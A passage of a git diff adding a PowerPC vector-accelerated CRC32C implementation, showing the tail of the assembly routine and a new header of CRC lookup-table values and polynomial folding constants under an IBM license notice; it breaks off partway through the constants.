lvx v14,off96,r4 + lvx v16,off96,r3 + VPERM(v14,v14,v16,byteswap) + VPMSUMW(v14,v14,v16) + bdz .Lv14 + + lvx v15,off112,r4 + lvx v17,off112,r3 + VPERM(v15,v15,v17,byteswap) + VPMSUMW(v15,v15,v17) + +.Lv15: vxor v19,v19,v15 +.Lv14: vxor v20,v20,v14 +.Lv13: vxor v19,v19,v13 +.Lv12: vxor v20,v20,v12 +.Lv11: vxor v19,v19,v11 +.Lv10: vxor v20,v20,v10 +.Lv9: vxor v19,v19,v9 +.Lv8: vxor v20,v20,v8 +.Lv7: vxor v19,v19,v7 +.Lv6: vxor v20,v20,v6 +.Lv5: vxor v19,v19,v5 +.Lv4: vxor v20,v20,v4 +.Lv3: vxor v19,v19,v3 +.Lv2: vxor v20,v20,v2 +.Lv1: vxor v19,v19,v1 +.Lv0: vxor v20,v20,v0 + + vxor v0,v19,v20 + + b .Lbarrett_reduction + +.Lzero: + mr r3,r10 + b .Lout + +FUNC_END(__crc32_vpmsum) diff --git a/util/crc32c_ppc_constants.h b/util/crc32c_ppc_constants.h new file mode 100644 index 00000000000..aa5ea98f8e2 --- /dev/null +++ b/util/crc32c_ppc_constants.h @@ -0,0 +1,893 @@ +// Copyright (C) 2015, 2017 International Business Machines Corp. +// All rights reserved. +// This source code is licensed under the BSD-style license found in the +// LICENSE file in the root directory of this source tree. An additional grant +// of patent rights can be found in the PATENTS file in the same directory. +// This source code is also licensed under the GPLv2 license found in the +// COPYING file in the root directory of this source tree. 
+#ifndef CRC32C_PPC_CONST_H +#define CRC32C_PPC_CONST_H +#define CRC 0x1edc6f41 +#define REFLECT +#define CRC_XOR + +#ifndef __ASSEMBLY__ +#ifdef CRC_TABLE +static const unsigned int crc_table[] = { + 0x00000000, 0xf26b8303, 0xe13b70f7, 0x1350f3f4, 0xc79a971f, 0x35f1141c, + 0x26a1e7e8, 0xd4ca64eb, 0x8ad958cf, 0x78b2dbcc, 0x6be22838, 0x9989ab3b, + 0x4d43cfd0, 0xbf284cd3, 0xac78bf27, 0x5e133c24, 0x105ec76f, 0xe235446c, + 0xf165b798, 0x030e349b, 0xd7c45070, 0x25afd373, 0x36ff2087, 0xc494a384, + 0x9a879fa0, 0x68ec1ca3, 0x7bbcef57, 0x89d76c54, 0x5d1d08bf, 0xaf768bbc, + 0xbc267848, 0x4e4dfb4b, 0x20bd8ede, 0xd2d60ddd, 0xc186fe29, 0x33ed7d2a, + 0xe72719c1, 0x154c9ac2, 0x061c6936, 0xf477ea35, 0xaa64d611, 0x580f5512, + 0x4b5fa6e6, 0xb93425e5, 0x6dfe410e, 0x9f95c20d, 0x8cc531f9, 0x7eaeb2fa, + 0x30e349b1, 0xc288cab2, 0xd1d83946, 0x23b3ba45, 0xf779deae, 0x05125dad, + 0x1642ae59, 0xe4292d5a, 0xba3a117e, 0x4851927d, 0x5b016189, 0xa96ae28a, + 0x7da08661, 0x8fcb0562, 0x9c9bf696, 0x6ef07595, 0x417b1dbc, 0xb3109ebf, + 0xa0406d4b, 0x522bee48, 0x86e18aa3, 0x748a09a0, 0x67dafa54, 0x95b17957, + 0xcba24573, 0x39c9c670, 0x2a993584, 0xd8f2b687, 0x0c38d26c, 0xfe53516f, + 0xed03a29b, 0x1f682198, 0x5125dad3, 0xa34e59d0, 0xb01eaa24, 0x42752927, + 0x96bf4dcc, 0x64d4cecf, 0x77843d3b, 0x85efbe38, 0xdbfc821c, 0x2997011f, + 0x3ac7f2eb, 0xc8ac71e8, 0x1c661503, 0xee0d9600, 0xfd5d65f4, 0x0f36e6f7, + 0x61c69362, 0x93ad1061, 0x80fde395, 0x72966096, 0xa65c047d, 0x5437877e, + 0x4767748a, 0xb50cf789, 0xeb1fcbad, 0x197448ae, 0x0a24bb5a, 0xf84f3859, + 0x2c855cb2, 0xdeeedfb1, 0xcdbe2c45, 0x3fd5af46, 0x7198540d, 0x83f3d70e, + 0x90a324fa, 0x62c8a7f9, 0xb602c312, 0x44694011, 0x5739b3e5, 0xa55230e6, + 0xfb410cc2, 0x092a8fc1, 0x1a7a7c35, 0xe811ff36, 0x3cdb9bdd, 0xceb018de, + 0xdde0eb2a, 0x2f8b6829, 0x82f63b78, 0x709db87b, 0x63cd4b8f, 0x91a6c88c, + 0x456cac67, 0xb7072f64, 0xa457dc90, 0x563c5f93, 0x082f63b7, 0xfa44e0b4, + 0xe9141340, 0x1b7f9043, 0xcfb5f4a8, 0x3dde77ab, 0x2e8e845f, 0xdce5075c, + 0x92a8fc17, 0x60c37f14, 0x73938ce0, 0x81f80fe3, 0x55326b08, 0xa759e80b, + 0xb4091bff, 0x466298fc, 0x1871a4d8, 0xea1a27db, 0xf94ad42f, 0x0b21572c, + 0xdfeb33c7, 0x2d80b0c4, 0x3ed04330, 0xccbbc033, 0xa24bb5a6, 0x502036a5, + 0x4370c551, 0xb11b4652, 0x65d122b9, 0x97baa1ba, 0x84ea524e, 0x7681d14d, + 0x2892ed69, 0xdaf96e6a, 0xc9a99d9e, 0x3bc21e9d, 0xef087a76, 0x1d63f975, + 0x0e330a81, 0xfc588982, 0xb21572c9, 0x407ef1ca, 0x532e023e, 0xa145813d, + 0x758fe5d6, 0x87e466d5, 0x94b49521, 0x66df1622, 0x38cc2a06, 0xcaa7a905, + 0xd9f75af1, 0x2b9cd9f2, 0xff56bd19, 0x0d3d3e1a, 0x1e6dcdee, 0xec064eed, + 0xc38d26c4, 0x31e6a5c7, 0x22b65633, 0xd0ddd530, 0x0417b1db, 0xf67c32d8, + 0xe52cc12c, 0x1747422f, 0x49547e0b, 0xbb3ffd08, 0xa86f0efc, 0x5a048dff, + 0x8ecee914, 0x7ca56a17, 0x6ff599e3, 0x9d9e1ae0, 0xd3d3e1ab, 0x21b862a8, + 0x32e8915c, 0xc083125f, 0x144976b4, 0xe622f5b7, 0xf5720643, 0x07198540, + 0x590ab964, 0xab613a67, 0xb831c993, 0x4a5a4a90, 0x9e902e7b, 0x6cfbad78, + 0x7fab5e8c, 0x8dc0dd8f, 0xe330a81a, 0x115b2b19, 0x020bd8ed, 0xf0605bee, + 0x24aa3f05, 0xd6c1bc06, 0xc5914ff2, 0x37faccf1, 0x69e9f0d5, 0x9b8273d6, + 0x88d28022, 0x7ab90321, 0xae7367ca, 0x5c18e4c9, 0x4f48173d, 0xbd23943e, + 0xf36e6f75, 0x0105ec76, 0x12551f82, 0xe03e9c81, 0x34f4f86a, 0xc69f7b69, + 0xd5cf889d, 0x27a40b9e, 0x79b737ba, 0x8bdcb4b9, 0x988c474d, 0x6ae7c44e, + 0xbe2da0a5, 0x4c4623a6, 0x5f16d052, 0xad7d5351, +}; + +#endif + +#else +#define MAX_SIZE 32768 +.constants : + + /* Reduce 262144 kbits to 1024 bits */ + /* x^261120 mod p(x)` << 1, x^261184 mod p(x)` << 1 */ + .octa 
0x00000000b6ca9e20000000009c37c408 + + /* x^260096 mod p(x)` << 1, x^260160 mod p(x)` << 1 */ + .octa 0x00000000350249a800000001b51df26c + + /* x^259072 mod p(x)` << 1, x^259136 mod p(x)` << 1 */ + .octa 0x00000001862dac54000000000724b9d0 + + /* x^258048 mod p(x)` << 1, x^258112 mod p(x)` << 1 */ + .octa 0x00000001d87fb48c00000001c00532fe + + /* x^257024 mod p(x)` << 1, x^257088 mod p(x)` << 1 */ + .octa 0x00000001f39b699e00000000f05a9362 + + /* x^256000 mod p(x)` << 1, x^256064 mod p(x)` << 1 */ + .octa 0x0000000101da11b400000001e1007970 + + /* x^254976 mod p(x)` << 1, x^255040 mod p(x)` << 1 */ + .octa 0x00000001cab571e000000000a57366ee + + /* x^253952 mod p(x)` << 1, x^254016 mod p(x)` << 1 */ + .octa 0x00000000c7020cfe0000000192011284 + + /* x^252928 mod p(x)` << 1, x^252992 mod p(x)` << 1 */ + .octa 0x00000000cdaed1ae0000000162716d9a + + /* x^251904 mod p(x)` << 1, x^251968 mod p(x)` << 1 */ + .octa 0x00000001e804effc00000000cd97ecde + + /* x^250880 mod p(x)` << 1, x^250944 mod p(x)` << 1 */ + .octa 0x0000000077c3ea3a0000000058812bc0 + + /* x^249856 mod p(x)` << 1, x^249920 mod p(x)` << 1 */ + .octa 0x0000000068df31b40000000088b8c12e + + /* x^248832 mod p(x)` << 1, x^248896 mod p(x)` << 1 */ + .octa 0x00000000b059b6c200000001230b234c + + /* x^247808 mod p(x)` << 1, x^247872 mod p(x)` << 1 */ + .octa 0x0000000145fb8ed800000001120b416e + + /* x^246784 mod p(x)` << 1, x^246848 mod p(x)` << 1 */ + .octa 0x00000000cbc0916800000001974aecb0 + + /* x^245760 mod p(x)` << 1, x^245824 mod p(x)` << 1 */ + .octa 0x000000005ceeedc2000000008ee3f226 + + /* x^244736 mod p(x)` << 1, x^244800 mod p(x)` << 1 */ + .octa 0x0000000047d74e8600000001089aba9a + + /* x^243712 mod p(x)` << 1, x^243776 mod p(x)` << 1 */ + .octa 0x00000001407e9e220000000065113872 + + /* x^242688 mod p(x)` << 1, x^242752 mod p(x)` << 1 */ + .octa 0x00000001da967bda000000005c07ec10 + + /* x^241664 mod p(x)` << 1, x^241728 mod p(x)` << 1 */ + .octa 0x000000006c8983680000000187590924 + + /* x^240640 mod p(x)` << 1, x^240704 mod p(x)` << 1 */ + .octa 0x00000000f2d14c9800000000e35da7c6 + + /* x^239616 mod p(x)` << 1, x^239680 mod p(x)` << 1 */ + .octa 0x00000001993c6ad4000000000415855a + + /* x^238592 mod p(x)` << 1, x^238656 mod p(x)` << 1 */ + .octa 0x000000014683d1ac0000000073617758 + + /* x^237568 mod p(x)` << 1, x^237632 mod p(x)` << 1 */ + .octa 0x00000001a7c93e6c0000000176021d28 + + /* x^236544 mod p(x)` << 1, x^236608 mod p(x)` << 1 */ + .octa 0x000000010211e90a00000001c358fd0a + + /* x^235520 mod p(x)` << 1, x^235584 mod p(x)` << 1 */ + .octa 0x000000001119403e00000001ff7a2c18 + + /* x^234496 mod p(x)` << 1, x^234560 mod p(x)` << 1 */ + .octa 0x000000001c3261aa00000000f2d9f7e4 + + /* x^233472 mod p(x)` << 1, x^233536 mod p(x)` << 1 */ + .octa 0x000000014e37a634000000016cf1f9c8 + + /* x^232448 mod p(x)` << 1, x^232512 mod p(x)` << 1 */ + .octa 0x0000000073786c0c000000010af9279a + + /* x^231424 mod p(x)` << 1, x^231488 mod p(x)` << 1 */ + .octa 0x000000011dc037f80000000004f101e8 + + /* x^230400 mod p(x)` << 1, x^230464 mod p(x)` << 1 */ + .octa 0x0000000031433dfc0000000070bcf184 + + /* x^229376 mod p(x)` << 1, x^229440 mod p(x)` << 1 */ + .octa 0x000000009cde8348000000000a8de642 + + /* x^228352 mod p(x)` << 1, x^228416 mod p(x)` << 1 */ + .octa 0x0000000038d3c2a60000000062ea130c + + /* x^227328 mod p(x)` << 1, x^227392 mod p(x)` << 1 */ + .octa 0x000000011b25f26000000001eb31cbb2 + + /* x^226304 mod p(x)` << 1, x^226368 mod p(x)` << 1 */ + .octa 0x000000001629e6f00000000170783448 + + /* x^225280 mod p(x)` << 1, x^225344 mod p(x)` 
<< 1 */ + .octa 0x0000000160838b4c00000001a684b4c6 + + /* x^224256 mod p(x)` << 1, x^224320 mod p(x)` << 1 */ + .octa 0x000000007a44011c00000000253ca5b4 + + /* x^223232 mod p(x)` << 1, x^223296 mod p(x)` << 1 */ + .octa 0x00000000226f417a0000000057b4b1e2 + + /* x^222208 mod p(x)` << 1, x^222272 mod p(x)` << 1 */ + .octa 0x0000000045eb2eb400000000b6bd084c + + /* x^221184 mod p(x)` << 1, x^221248 mod p(x)` << 1 */ + .octa 0x000000014459d70c0000000123c2d592 + + /* x^220160 mod p(x)` << 1, x^220224 mod p(x)` << 1 */ + .octa 0x00000001d406ed8200000000159dafce + + /* x^219136 mod p(x)` << 1, x^219200 mod p(x)` << 1 */ + .octa 0x0000000160c8e1a80000000127e1a64e + + /* x^218112 mod p(x)` << 1, x^218176 mod p(x)` << 1 */ + .octa 0x0000000027ba80980000000056860754 + + /* x^217088 mod p(x)` << 1, x^217152 mod p(x)` << 1 */ + .octa 0x000000006d92d01800000001e661aae8 + + /* x^216064 mod p(x)` << 1, x^216128 mod p(x)` << 1 */ + .octa 0x000000012ed7e3f200000000f82c6166 + + /* x^215040 mod p(x)` << 1, x^215104 mod p(x)` << 1 */ + .octa 0x000000002dc8778800000000c4f9c7ae + + /* x^214016 mod p(x)` << 1, x^214080 mod p(x)` << 1 */ + .octa 0x0000000018240bb80000000074203d20 + + /* x^212992 mod p(x)` << 1, x^213056 mod p(x)` << 1 */ + .octa 0x000000001ad381580000000198173052 + + /* x^211968 mod p(x)` << 1, x^212032 mod p(x)` << 1 */ + .octa 0x00000001396b78f200000001ce8aba54 + + /* x^210944 mod p(x)` << 1, x^211008 mod p(x)` << 1 */ + .octa 0x000000011a68133400000001850d5d94 + + /* x^209920 mod p(x)` << 1, x^209984 mod p(x)` << 1 */ + .octa 0x000000012104732e00000001d609239c + + /* x^208896 mod p(x)` << 1, x^208960 mod p(x)` << 1 */ + .octa 0x00000000a140d90c000000001595f048 + + /* x^207872 mod p(x)` << 1, x^207936 mod p(x)` << 1 */ + .octa 0x00000001b7215eda0000000042ccee08 + + /* x^206848 mod p(x)` << 1, x^206912 mod p(x)` << 1 */ + .octa 0x00000001aaf1df3c000000010a389d74 + + /* x^205824 mod p(x)` << 1, x^205888 mod p(x)` << 1 */ + .octa 0x0000000029d15b8a000000012a840da6 + + /* x^204800 mod p(x)` << 1, x^204864 mod p(x)` << 1 */ + .octa 0x00000000f1a96922000000001d181c0c + + /* x^203776 mod p(x)` << 1, x^203840 mod p(x)` << 1 */ + .octa 0x00000001ac80d03c0000000068b7d1f6 + + /* x^202752 mod p(x)` << 1, x^202816 mod p(x)` << 1 */ + .octa 0x000000000f11d56a000000005b0f14fc + + /* x^201728 mod p(x)` << 1, x^201792 mod p(x)` << 1 */ + .octa 0x00000001f1c022a20000000179e9e730 + + /* x^200704 mod p(x)` << 1, x^200768 mod p(x)` << 1 */ + .octa 0x0000000173d00ae200000001ce1368d6 + + /* x^199680 mod p(x)` << 1, x^199744 mod p(x)` << 1 */ + .octa 0x00000001d4ffe4ac0000000112c3a84c + + /* x^198656 mod p(x)` << 1, x^198720 mod p(x)` << 1 */ + .octa 0x000000016edc5ae400000000de940fee + + /* x^197632 mod p(x)` << 1, x^197696 mod p(x)` << 1 */ + .octa 0x00000001f1a0214000000000fe896b7e + + /* x^196608 mod p(x)` << 1, x^196672 mod p(x)` << 1 */ + .octa 0x00000000ca0b28a000000001f797431c + + /* x^195584 mod p(x)` << 1, x^195648 mod p(x)` << 1 */ + .octa 0x00000001928e30a20000000053e989ba + + /* x^194560 mod p(x)` << 1, x^194624 mod p(x)` << 1 */ + .octa 0x0000000097b1b002000000003920cd16 + + /* x^193536 mod p(x)` << 1, x^193600 mod p(x)` << 1 */ + .octa 0x00000000b15bf90600000001e6f579b8 + + /* x^192512 mod p(x)` << 1, x^192576 mod p(x)` << 1 */ + .octa 0x00000000411c5d52000000007493cb0a + + /* x^191488 mod p(x)` << 1, x^191552 mod p(x)` << 1 */ + .octa 0x00000001c36f330000000001bdd376d8 + + /* x^190464 mod p(x)` << 1, x^190528 mod p(x)` << 1 */ + .octa 0x00000001119227e0000000016badfee6 + + /* x^189440 mod p(x)` << 1, 
x^189504 mod p(x)` << 1 */ + .octa 0x00000000114d47020000000071de5c58 + + /* x^188416 mod p(x)` << 1, x^188480 mod p(x)` << 1 */ + .octa 0x00000000458b5b9800000000453f317c + + /* x^187392 mod p(x)` << 1, x^187456 mod p(x)` << 1 */ + .octa 0x000000012e31fb8e0000000121675cce + + /* x^186368 mod p(x)` << 1, x^186432 mod p(x)` << 1 */ + .octa 0x000000005cf619d800000001f409ee92 + + /* x^185344 mod p(x)` << 1, x^185408 mod p(x)` << 1 */ + .octa 0x0000000063f4d8b200000000f36b9c88 + + /* x^184320 mod p(x)` << 1, x^184384 mod p(x)` << 1 */ + .octa 0x000000004138dc8a0000000036b398f4 + + /* x^183296 mod p(x)` << 1, x^183360 mod p(x)` << 1 */ + .octa 0x00000001d29ee8e000000001748f9adc + + /* x^182272 mod p(x)` << 1, x^182336 mod p(x)` << 1 */ + .octa 0x000000006a08ace800000001be94ec00 + + /* x^181248 mod p(x)` << 1, x^181312 mod p(x)` << 1 */ + .octa 0x0000000127d4201000000000b74370d6 + + /* x^180224 mod p(x)` << 1, x^180288 mod p(x)` << 1 */ + .octa 0x0000000019d76b6200000001174d0b98 + + /* x^179200 mod p(x)` << 1, x^179264 mod p(x)` << 1 */ + .octa 0x00000001b1471f6e00000000befc06a4 + + /* x^178176 mod p(x)` << 1, x^178240 mod p(x)` << 1 */ + .octa 0x00000001f64c19cc00000001ae125288 + + /* x^177152 mod p(x)` << 1, x^177216 mod p(x)` << 1 */ + .octa 0x00000000003c0ea00000000095c19b34 + + /* x^176128 mod p(x)` << 1, x^176192 mod p(x)` << 1 */ + .octa 0x000000014d73abf600000001a78496f2 + + /* x^175104 mod p(x)` << 1, x^175168 mod p(x)` << 1 */ + .octa 0x00000001620eb84400000001ac5390a0 + + /* x^174080 mod p(x)` << 1, x^174144 mod p(x)` << 1 */ + .octa 0x0000000147655048000000002a80ed6e + + /* x^173056 mod p(x)` << 1, x^173120 mod p(x)` << 1 */ + .octa 0x0000000067b5077e00000001fa9b0128 + + /* x^172032 mod p(x)` << 1, x^172096 mod p(x)` << 1 */ + .octa 0x0000000010ffe20600000001ea94929e + + /* x^171008 mod p(x)` << 1, x^171072 mod p(x)` << 1 */ + .octa 0x000000000fee8f1e0000000125f4305c + + /* x^169984 mod p(x)` << 1, x^170048 mod p(x)` << 1 */ + .octa 0x00000001da26fbae00000001471e2002 + + /* x^168960 mod p(x)` << 1, x^169024 mod p(x)` << 1 */ + .octa 0x00000001b3a8bd880000000132d2253a + + /* x^167936 mod p(x)` << 1, x^168000 mod p(x)` << 1 */ + .octa 0x00000000e8f3898e00000000f26b3592 + + /* x^166912 mod p(x)` << 1, x^166976 mod p(x)` << 1 */ + .octa 0x00000000b0d0d28c00000000bc8b67b0 + + /* x^165888 mod p(x)` << 1, x^165952 mod p(x)` << 1 */ + .octa 0x0000000030f2a798000000013a826ef2 + + /* x^164864 mod p(x)` << 1, x^164928 mod p(x)` << 1 */ + .octa 0x000000000fba10020000000081482c84 + + /* x^163840 mod p(x)` << 1, x^163904 mod p(x)` << 1 */ + .octa 0x00000000bdb9bd7200000000e77307c2 + + /* x^162816 mod p(x)` << 1, x^162880 mod p(x)` << 1 */ + .octa 0x0000000075d3bf5a00000000d4a07ec8 + + /* x^161792 mod p(x)` << 1, x^161856 mod p(x)` << 1 */ + .octa 0x00000000ef1f98a00000000017102100 + + /* x^160768 mod p(x)` << 1, x^160832 mod p(x)` << 1 */ + .octa 0x00000000689c760200000000db406486 + + /* x^159744 mod p(x)` << 1, x^159808 mod p(x)` << 1 */ + .octa 0x000000016d5fa5fe0000000192db7f88 + + /* x^158720 mod p(x)` << 1, x^158784 mod p(x)` << 1 */ + .octa 0x00000001d0d2b9ca000000018bf67b1e + + /* x^157696 mod p(x)` << 1, x^157760 mod p(x)` << 1 */ + .octa 0x0000000041e7b470000000007c09163e + + /* x^156672 mod p(x)` << 1, x^156736 mod p(x)` << 1 */ + .octa 0x00000001cbb6495e000000000adac060 + + /* x^155648 mod p(x)` << 1, x^155712 mod p(x)` << 1 */ + .octa 0x000000010052a0b000000000bd8316ae + + /* x^154624 mod p(x)` << 1, x^154688 mod p(x)` << 1 */ + .octa 0x00000001d8effb5c000000019f09ab54 + + /* x^153600 
mod p(x)` << 1, x^153664 mod p(x)` << 1 */ + .octa 0x00000001d969853c0000000125155542 + + /* x^152576 mod p(x)` << 1, x^152640 mod p(x)` << 1 */ + .octa 0x00000000523ccce2000000018fdb5882 + + /* x^151552 mod p(x)` << 1, x^151616 mod p(x)` << 1 */ + .octa 0x000000001e2436bc00000000e794b3f4 + + /* x^150528 mod p(x)` << 1, x^150592 mod p(x)` << 1 */ + .octa 0x00000000ddd1c3a2000000016f9bb022 + + /* x^149504 mod p(x)` << 1, x^149568 mod p(x)` << 1 */ + .octa 0x0000000019fcfe3800000000290c9978 + + /* x^148480 mod p(x)` << 1, x^148544 mod p(x)` << 1 */ + .octa 0x00000001ce95db640000000083c0f350 + + /* x^147456 mod p(x)` << 1, x^147520 mod p(x)` << 1 */ + .octa 0x00000000af5828060000000173ea6628 + + /* x^146432 mod p(x)` << 1, x^146496 mod p(x)` << 1 */ + .octa 0x00000001006388f600000001c8b4e00a + + /* x^145408 mod p(x)` << 1, x^145472 mod p(x)` << 1 */ + .octa 0x0000000179eca00a00000000de95d6aa + + /* x^144384 mod p(x)` << 1, x^144448 mod p(x)` << 1 */ + .octa 0x0000000122410a6a000000010b7f7248 + + /* x^143360 mod p(x)` << 1, x^143424 mod p(x)` << 1 */ + .octa 0x000000004288e87c00000001326e3a06 + + /* x^142336 mod p(x)` << 1, x^142400 mod p(x)` << 1 */ + .octa 0x000000016c5490da00000000bb62c2e6 + + /* x^141312 mod p(x)` << 1, x^141376 mod p(x)` << 1 */ + .octa 0x00000000d1c71f6e0000000156a4b2c2 + + /* x^140288 mod p(x)` << 1, x^140352 mod p(x)` << 1 */ + .octa 0x00000001b4ce08a6000000011dfe763a + + /* x^139264 mod p(x)` << 1, x^139328 mod p(x)` << 1 */ + .octa 0x00000001466ba60c000000007bcca8e2 + + /* x^138240 mod p(x)` << 1, x^138304 mod p(x)` << 1 */ + .octa 0x00000001f6c488a40000000186118faa + + /* x^137216 mod p(x)` << 1, x^137280 mod p(x)` << 1 */ + .octa 0x000000013bfb06820000000111a65a88 + + /* x^136192 mod p(x)` << 1, x^136256 mod p(x)` << 1 */ + .octa 0x00000000690e9e54000000003565e1c4 + + /* x^135168 mod p(x)` << 1, x^135232 mod p(x)` << 1 */ + .octa 0x00000000281346b6000000012ed02a82 + + /* x^134144 mod p(x)` << 1, x^134208 mod p(x)` << 1 */ + .octa 0x000000015646402400000000c486ecfc + + /* x^133120 mod p(x)` << 1, x^133184 mod p(x)` << 1 */ + .octa 0x000000016063a8dc0000000001b951b2 + + /* x^132096 mod p(x)` << 1, x^132160 mod p(x)` << 1 */ + .octa 0x0000000116a663620000000048143916 + + /* x^131072 mod p(x)` << 1, x^131136 mod p(x)` << 1 */ + .octa 0x000000017e8aa4d200000001dc2ae124 + + /* x^130048 mod p(x)` << 1, x^130112 mod p(x)` << 1 */ + .octa 0x00000001728eb10c00000001416c58d6 + + /* x^129024 mod p(x)` << 1, x^129088 mod p(x)` << 1 */ + .octa 0x00000001b08fd7fa00000000a479744a + + /* x^128000 mod p(x)` << 1, x^128064 mod p(x)` << 1 */ + .octa 0x00000001092a16e80000000096ca3a26 + + /* x^126976 mod p(x)` << 1, x^127040 mod p(x)` << 1 */ + .octa 0x00000000a505637c00000000ff223d4e + + /* x^125952 mod p(x)` << 1, x^126016 mod p(x)` << 1 */ + .octa 0x00000000d94869b2000000010e84da42 + + /* x^124928 mod p(x)` << 1, x^124992 mod p(x)` << 1 */ + .octa 0x00000001c8b203ae00000001b61ba3d0 + + /* x^123904 mod p(x)` << 1, x^123968 mod p(x)` << 1 */ + .octa 0x000000005704aea000000000680f2de8 + + /* x^122880 mod p(x)` << 1, x^122944 mod p(x)` << 1 */ + .octa 0x000000012e295fa2000000008772a9a8 + + /* x^121856 mod p(x)` << 1, x^121920 mod p(x)` << 1 */ + .octa 0x000000011d0908bc0000000155f295bc + + /* x^120832 mod p(x)` << 1, x^120896 mod p(x)` << 1 */ + .octa 0x0000000193ed97ea00000000595f9282 + + /* x^119808 mod p(x)` << 1, x^119872 mod p(x)` << 1 */ + .octa 0x000000013a0f1c520000000164b1c25a + + /* x^118784 mod p(x)` << 1, x^118848 mod p(x)` << 1 */ + .octa 0x000000010c2c40c000000000fbd67c50 
+ + /* x^117760 mod p(x)` << 1, x^117824 mod p(x)` << 1 */ + .octa 0x00000000ff6fac3e0000000096076268 + + /* x^116736 mod p(x)` << 1, x^116800 mod p(x)` << 1 */ + .octa 0x000000017b3609c000000001d288e4cc + + /* x^115712 mod p(x)` << 1, x^115776 mod p(x)` << 1 */ + .octa 0x0000000088c8c92200000001eaac1bdc + + /* x^114688 mod p(x)` << 1, x^114752 mod p(x)` << 1 */ + .octa 0x00000001751baae600000001f1ea39e2 + + /* x^113664 mod p(x)` << 1, x^113728 mod p(x)` << 1 */ + .octa 0x000000010795297200000001eb6506fc + + /* x^112640 mod p(x)` << 1, x^112704 mod p(x)` << 1 */ + .octa 0x0000000162b00abe000000010f806ffe + + /* x^111616 mod p(x)` << 1, x^111680 mod p(x)` << 1 */ + .octa 0x000000000d7b404c000000010408481e + + /* x^110592 mod p(x)` << 1, x^110656 mod p(x)` << 1 */ + .octa 0x00000000763b13d40000000188260534 + + /* x^109568 mod p(x)` << 1, x^109632 mod p(x)` << 1 */ + .octa 0x00000000f6dc22d80000000058fc73e0 + + /* x^108544 mod p(x)` << 1, x^108608 mod p(x)` << 1 */ + .octa 0x000000007daae06000000000391c59b8 + + /* x^107520 mod p(x)` << 1, x^107584 mod p(x)` << 1 */ + .octa 0x000000013359ab7c000000018b638400 + + /* x^106496 mod p(x)` << 1, x^106560 mod p(x)` << 1 */ + .octa 0x000000008add438a000000011738f5c4 + + /* x^105472 mod p(x)` << 1, x^105536 mod p(x)` << 1 */ + .octa 0x00000001edbefdea000000008cf7c6da + + /* x^104448 mod p(x)` << 1, x^104512 mod p(x)` << 1 */ + .octa 0x000000004104e0f800000001ef97fb16 + + /* x^103424 mod p(x)` << 1, x^103488 mod p(x)` << 1 */ + .octa 0x00000000b48a82220000000102130e20 + + /* x^102400 mod p(x)` << 1, x^102464 mod p(x)` << 1 */ + .octa 0x00000001bcb4684400000000db968898 + + /* x^101376 mod p(x)` << 1, x^101440 mod p(x)` << 1 */ + .octa 0x000000013293ce0a00000000b5047b5e + + /* x^100352 mod p(x)` << 1, x^100416 mod p(x)` << 1 */ + .octa 0x00000001710d0844000000010b90fdb2 + + /* x^99328 mod p(x)` << 1, x^99392 mod p(x)` << 1 */ + .octa 0x0000000117907f6e000000004834a32e + + /* x^98304 mod p(x)` << 1, x^98368 mod p(x)` << 1 */ + .octa 0x0000000087ddf93e0000000059c8f2b0 + + /* x^97280 mod p(x)` << 1, x^97344 mod p(x)` << 1 */ + .octa 0x000000005970e9b00000000122cec508 + + /* x^96256 mod p(x)` << 1, x^96320 mod p(x)` << 1 */ + .octa 0x0000000185b2b7d0000000000a330cda + + /* x^95232 mod p(x)` << 1, x^95296 mod p(x)` << 1 */ + .octa 0x00000001dcee0efc000000014a47148c + + /* x^94208 mod p(x)` << 1, x^94272 mod p(x)` << 1 */ + .octa 0x0000000030da27220000000042c61cb8 + + /* x^93184 mod p(x)` << 1, x^93248 mod p(x)` << 1 */ + .octa 0x000000012f925a180000000012fe6960 + + /* x^92160 mod p(x)` << 1, x^92224 mod p(x)` << 1 */ + .octa 0x00000000dd2e357c00000000dbda2c20 + + /* x^91136 mod p(x)` << 1, x^91200 mod p(x)` << 1 */ + .octa 0x00000000071c80de000000011122410c + + /* x^90112 mod p(x)` << 1, x^90176 mod p(x)` << 1 */ + .octa 0x000000011513140a00000000977b2070 + + /* x^89088 mod p(x)` << 1, x^89152 mod p(x)` << 1 */ + .octa 0x00000001df876e8e000000014050438e + + /* x^88064 mod p(x)` << 1, x^88128 mod p(x)` << 1 */ + .octa 0x000000015f81d6ce0000000147c840e8 + + /* x^87040 mod p(x)` << 1, x^87104 mod p(x)` << 1 */ + .octa 0x000000019dd94dbe00000001cc7c88ce + + /* x^86016 mod p(x)` << 1, x^86080 mod p(x)` << 1 */ + .octa 0x00000001373d206e00000001476b35a4 + + /* x^84992 mod p(x)` << 1, x^85056 mod p(x)` << 1 */ + .octa 0x00000000668ccade000000013d52d508 + + /* x^83968 mod p(x)` << 1, x^84032 mod p(x)` << 1 */ + .octa 0x00000001b192d268000000008e4be32e + + /* x^82944 mod p(x)` << 1, x^83008 mod p(x)` << 1 */ + .octa 0x00000000e30f3a7800000000024120fe + + /* x^81920 mod 
p(x)` << 1, x^81984 mod p(x)` << 1 */ + .octa 0x000000010ef1f7bc00000000ddecddb4 + + /* x^80896 mod p(x)` << 1, x^80960 mod p(x)` << 1 */ + .octa 0x00000001f5ac738000000000d4d403bc + + /* x^79872 mod p(x)` << 1, x^79936 mod p(x)` << 1 */ + .octa 0x000000011822ea7000000001734b89aa + + /* x^78848 mod p(x)` << 1, x^78912 mod p(x)` << 1 */ + .octa 0x00000000c3a33848000000010e7a58d6 + + /* x^77824 mod p(x)` << 1, x^77888 mod p(x)` << 1 */ + .octa 0x00000001bd151c2400000001f9f04e9c + + /* x^76800 mod p(x)` << 1, x^76864 mod p(x)` << 1 */ + .octa 0x0000000056002d7600000000b692225e + + /* x^75776 mod p(x)` << 1, x^75840 mod p(x)` << 1 */ + .octa 0x000000014657c4f4000000019b8d3f3e + + /* x^74752 mod p(x)` << 1, x^74816 mod p(x)` << 1 */ + .octa 0x0000000113742d7c00000001a874f11e + + /* x^73728 mod p(x)` << 1, x^73792 mod p(x)` << 1 */ + .octa 0x000000019c5920ba000000010d5a4254 + + /* x^72704 mod p(x)` << 1, x^72768 mod p(x)` << 1 */ + .octa 0x000000005216d2d600000000bbb2f5d6 + + /* x^71680 mod p(x)` << 1, x^71744 mod p(x)` << 1 */ + .octa 0x0000000136f5ad8a0000000179cc0e36 + + /* x^70656 mod p(x)` << 1, x^70720 mod p(x)` << 1 */ + .octa 0x000000018b07beb600000001dca1da4a + + /* x^69632 mod p(x)` << 1, x^69696 mod p(x)` << 1 */ + .octa 0x00000000db1e93b000000000feb1a192 + + /* 